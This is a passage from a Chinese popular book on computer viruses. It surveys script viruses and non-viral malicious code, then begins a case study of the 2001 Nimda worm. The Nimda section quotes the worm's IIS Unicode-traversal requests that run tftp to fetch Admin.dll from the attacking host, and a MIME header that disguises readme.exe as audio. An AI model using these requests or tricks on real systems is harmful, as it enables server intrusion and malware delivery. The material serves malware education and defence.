按键盘上方向键 ← 或 → 可快速上下翻页,按键盘上的 Enter 键可回到本书目录页,按键盘上方向键 ↑ 可回到本页顶部!
————未阅读完?加入书签已便下次继续阅读!
苋菀资迪帧R桓鲋屑兜腣B程序员,没有任何的汇编知识,很容易就能制作类似的蠕虫病毒。
计算机世界的不断发展,界面的友好性以及代码开放性都为病毒的产生提供更好的平台。一个程序简单的病毒,同样能够成为破坏力强大的超级病毒。可以这么说:病毒制作早已经进入高级编程阶段。不会低级机器语言的程序员,也能够制作功能强大的病毒。
正是因为病毒制作进入高级编程阶段,使得病毒的制作更加容易,更多稍微有编程基础的人就能写出病毒来。同时,象脚本病毒这样的代码,如果不加密,它的源代码也能轻松看见,这被更多的有低级趣味的低级程序员所利用。从“爱虫”等脚本病毒开始,它们的源代码也随着病毒一起扩散开来,被人改装过后就发展成新的病毒,什么Homepage、Mayday等,都几乎差不多。最近,又有人改装成“杰西卡蠕虫”病毒,用“163电子邮箱收费通知”做标题,其基本代码和扩散部分代码完全是I Love You 病毒的抄袭。
脚本病毒包括下面的几种基本类型:
* 基于JAVAScript的脚本病毒
使用JAVAScript语言编写的病毒,主要运行在IE浏览器环境中,可以对浏览器的设置进行修改,主要破坏是对注册表的修改,危害不是很大。
* 基于VBScript的脚本病毒
使用VBScript语言的病毒,可以在浏览器环境中运行,更重要的是,这种病毒和普通的宏病毒并没有非常清晰的界限,可以在Office,主要是Outlook中运行,可以执行的操作非常多,前面描述的例子就是使用VBScript语言编写的,甚至可以修改硬盘上的东西,删除文件,执行程序等,危害非常大。
* 基于PHP的脚本病毒
这是新的病毒类型,感染PHP脚本文件,主要对服务器造成影响,对个人电脑影响不大,目前仅有一个“新世界”(NewWorld)病毒,并没有造成很大的破坏,但是前景非常难以估计,如果PHP得到更加广泛的使用,这种病毒将成为真正的威胁。
* 脚本语言和木马程序结合的病毒
这种病毒除了使用脚本语言进行扩散以外,还会在受到侵入的计算机上安装一个名为特洛伊木马程序,容许他人未经授权访问受到感染的计算机。一种典型的方法是,通过直接在病毒代码中包括二进制的木马程序编码,或者另外一个叫做VIRUS。BIN的文件,通过脚本语言直接执行DEBUG程序,使用DEBUG程序将VIRUS。BIN存储成为VIRUS。EXE,然后通过脚本语言就可以偷偷的执行这个木马程序了。
这种木马和脚本相结合的病毒已经成为最近病毒发展的新趋势,也给反病毒软件厂商带来了很大的挑战。
第八节 针对IRC的蠕虫程序
这类病毒在90年代早期曾经广泛流行,但是随着即时聊天系统的普及和基于浏览的浏览逐渐成为交流的主要方式,这种病毒出现的机会也就越来越小了,所以我们对这种病毒不作详细的描述。
第九节 “恶意代码”—不是病毒的病毒
第一种恶意代码是远程控制程序,通常称之为特洛伊木马,关于这种恶意代码我们将在有关黑客那一章作详细的描述。
第二种是恶作剧程序,最有名的是“麦当劳女鬼”,这个恶作剧程序在香港曾经吓死了女职员,虽然由于不具有自我传播的特性,但是所有的杀毒软件厂商仍然把这个程序作为恶意代码处理。杀无赦!
第三种是潜在的病毒,由于开发中的错误或者其他一些原因,造成病毒的感染部分不能正常工作,这些程序不能看作病毒,但是杀毒软件也把它作为恶意代码处理。
还有就是各种病毒制造机,多态病毒生成器等,这些东西虽然不是病毒,但是作为病毒的开发工具,还是不要流传的好,所以杀毒软件看到这些程序当然是“仇人相见分外眼红”了,杀,没有什么好商量的。
第四章 真实的病毒故事
第一节 尼姆达病毒,和恐怖分子有关?
2001年9月18日,距离美国“911”恐怖分子袭击事件整整一周的时间,一个新的,传染力非常巨大的病毒首先在美国出现,由于这个时间和出现的地点是如此的巧合,因此有报道认为这个病毒是恐怖分子策划的又一起针对美国的袭击事件,当然我对此表示怀疑,如果需要配合911的袭击的话,为什么不在9月11日当天就散布这个病毒,这样的效果不是更好吗。
产生和传播:
2001年9月18日上午在美国首次出现,当天下午,已经有超过130,000台服务器和个人电脑遭受感染
2001年9月18日晚,在日本、韩国、中国香港、新加坡和中国大陆地区都收到感染该病毒的报告,同时,该病毒也迅速传播到欧洲地区。
2001年9月19日,超过150,000的公司遭受感染,大量公司网络遭到病毒袭击后,不得不关闭自己的因特网服务器。
截至2001年9月19日,几乎所有和因特网连接的电脑都有可能遭受到病毒的袭击。
危害和损失:
对网络带宽的危害,为了传播病毒,该病毒发送带有附件的电子邮件,然后扫描并感染易受攻击的服务器,并感染到网络的共享硬盘上,接着向所有访问被感染服务器所控制网页的上网者传播病毒,最大的危害是对系统带宽方面的,由于病毒的传播占用了大量的系统带宽,造成系统速度的明显下降。
带宽:考察网络性能的一个重要指标,类似于高速公路的宽度,显然双向六车道的高速公路,通过能力要远远大于双向四车道的高速公路。带宽决定了在一段指定的时间内,可以通过的数据量,高的带宽,可以使你在一分钟之内,下载更多的歌曲,可以更快的浏览网页。
安全漏洞,由于该病毒会打开硬盘的所有共享,并使任何用户使用guest帐号就可以登录到被感染的电脑上,这样会造成严重的安全漏洞,被感染电脑的重要信息、重要文件会被任何访问者轻易的获取。
guest帐号:在安全专家的眼中,Guest帐号是系统安全的恶梦,在一般基于口令的系统安全策略中,任何人登录到电脑上,需要一个用户名和一个口令,然后才可以访问相应的文件或者程序。为了在整个网络范围内提供一些大家可以随时访问的公共资源,一般系统都提供了一个guest帐号,使用这个用户名可以不需要口令就进入系统,如果guest帐号的权限是所有的硬盘、所有的权限(读、写、删除等等),你可以想象这对系统安全是一个多致命的打击。
经济损失,虽然尼姆达病毒不会实际的破坏硬盘或者数据,但是它采用的传播方式众多,占用大量的网络资源,更重要的是由于它所引起的安全漏洞,将使被感染的电脑必须停止服务并且彻底清除病毒(最稳妥的方法只有重新安装系统,而且还需要对所有的HTML页面进行清理),这种停止服务和重新安装软件的费用是巨大的,根据估计,截至到2001年8月24日,造成的经济损失已经超过5。3亿美元。
下面我们稍微深入地看一看这个被誉为“瑞士军刀”的病毒。
名称:
下面这些名称都指的是尼姆达病毒:
Wormncept。57344
W32/Nimda。A@mm
W32/Nimda@mm
I…Worm。Nimda
中国一号
受影响的系统:
所有的Windows 32位平台,Windows 95; Windows 98; Windows Me; Windows NT 4; Windows 2000
大小: 57344字节
病毒文件:
该病毒可能会以下面这些文件名存在,病毒的作者采用了很高明的隐蔽手法,这些文件都是实际系统中存在的,但是病毒将自己放在一个稍微不同的位置,这样你就很难注意到它的存在了(甚至包括我这样的专家,也弄不清微软自己的mmc。exe究竟应该放在windows的目录还是Windows下面的系统目录中):
Windows目录、系统目录和临时目录:Windows目录就是你将Windows安装到的目录,对于Windows9x一般都是c:windows,或者其他硬盘上的windows目录,Windows2000是Winnt,如果你在安装时选择了其他目录,那么就是你安装时选择的目录。系统目录是Windows目录下的子目录,一般是WindowsSystem目录,如果是Windows NT或者Windows2000,是Winntsystem32目录。临时目录是系统存放临时文件的地方,也是Windows目录下的子目录,一般是WindowsTemp目录。
mmc。exe:出现在windows文件夹,执行扫描和创建tftpd的进程就是它。注意windows系统目录里也有一个mmc。exe,这个mmc。exe是Windows本身就存在的,是微软管理控制台程序(Microsoft Manage Console),微软的一个管理程序。
riched20。dll:riched20。dll除了出现在windows系统目录里,还可能出现在任何有*。doc文件的目录里。 Riched20。dll是进行文本编辑的一个动态连接库,因为它是winword。exe和wordpad。exe运行时都要调用的所以当打开DOC文件时就等于运行了尼姆达病毒。
'Admin。dll' Admin。dll除了在C:,D:,E:的根目录外还可出现在下面的〃TFTP*****〃出现的地方。
'load。exe' 出现在windows系统目录,配合对system。ini的修改,可以保证在启动系统的时候,首先执行的是这个文件。
'%temp%readme。exe',临时目录下面的readme。exe文件。
'TFTP****' 形如〃TFTP3233〃。文件位置取决于使用tftp的目录。如果是 〃GET /scripts/root。exe?/c+tftp …i '本地IP地址' GET Admin。dll HTTP/1。0〃 那么位置就在〃Inetpubscripts”。如果是 〃GET /scripts/。。%c1%1c。。/winnt/system32/cmd。exe?/c+tftp …i '本地IP地址' GET Admin。dll HTTP/1。0〃 那么位置就在〃/scripts/。。%c1%1c。。/〃也就是根目录。
%c1%1c?在浏览一个网页的时候,我们经常会看到这样一些以百分号开始的符号,实际上这是一些中文或者其他非西方文字的字符,很多老的标准是以英文字母为基础的,为了和这些软件兼容,在表示非西方字符的时候,就采用%数字+%数字的方法表示下面是一个unicode的编码。
Unicode:Unicode 是一种重要的交互和显示的通用字符编码标准,它覆盖了美国、欧洲、中东、非洲、印度、亚洲和太平洋的语言,以及古文和专业符号。Unicode 允许交换、处理和显示多语言文本以及公用的专业和数学符号。它希望能够解决多语言的计算,如不同国家的字符标准,但并不是所有的现代或古文都能够获得支持,象中国文字,《康熙字典》收录的实际万汉字中。
Unicode 字符可以适用于所有已知的编码。Unicode 是继 ASCII(美国国家交互信息标准编码)字符码后的一种新字符编码,它用一个16位(两个字节)的数字编码一个字符。因此最多可以表示65536个字符。可以满足绝大多数现代语言字符数字化的需要。
'readme。eml' 这是一个邮件文件,这个巧妙的文件利用了IE5。01/IE5。5的一个重要漏洞(为什么微软的东西总有这么多的漏洞呢)。我们知道html格式的邮件中图片和多媒体文件都是自动打开的,而可执行文件不是。但如果把可执行文件指定为多媒体类型,也会自动下载打开。下面是readme。eml的一段代码:
_ABC1234567890DEF_
Content…Type: audio/x…wav; 骗浏览器自己是一个音频文件!
name=〃readme。exe〃
Content…Transfer…Encoding: base64
Content…ID:
另外,如果文件夹是〃按web页查看〃(如果你把鼠标移动到一个文件上面的时候,显示的光标是一只手,那你就要小心了),那么即使只是用鼠标单击选中readme。eml也会导致蠕虫的执行,如果把扩展名改为mht也是可以的,但改为htm就不行。
'readme。nws' 同readme。eml,只是出现的几率很小。
'*。exe' 可执行文件被感染后,可能是任何文件名。
传播方式:
(一)通过电子邮件 ,当用户收到邮件的正文为空,似乎没有附件,实际上邮件中嵌入了病毒的执行代码,当用户用OUTLOOK、OUTLOOK EXPRESS(没有安装微软的补丁包的情况下)收邮件,在预览邮件时,病毒就已经不知不觉中执行了。病毒执行时会将自己复制到临时目录,再运行在临时目录中的副本。病毒还会在windows的system目录中生成load。exe文件,同时修改system。ini中的shell从shell=explorer。exe改为explorer。exe load。exe …dontrunold,使病毒在下次系统启动时仍然被激活。另外,在system目录下,病毒还会生成一个副本:riched20。dll。而riched20。dll目录在windows系统中就存在,而它就把它覆盖掉了。病毒执行之后,会在因特网临时文件夹中读取所有〃htm〃,〃html〃文件并从中提取电子邮件地址, 从信箱读取电子邮件地址并从中提取SMTP服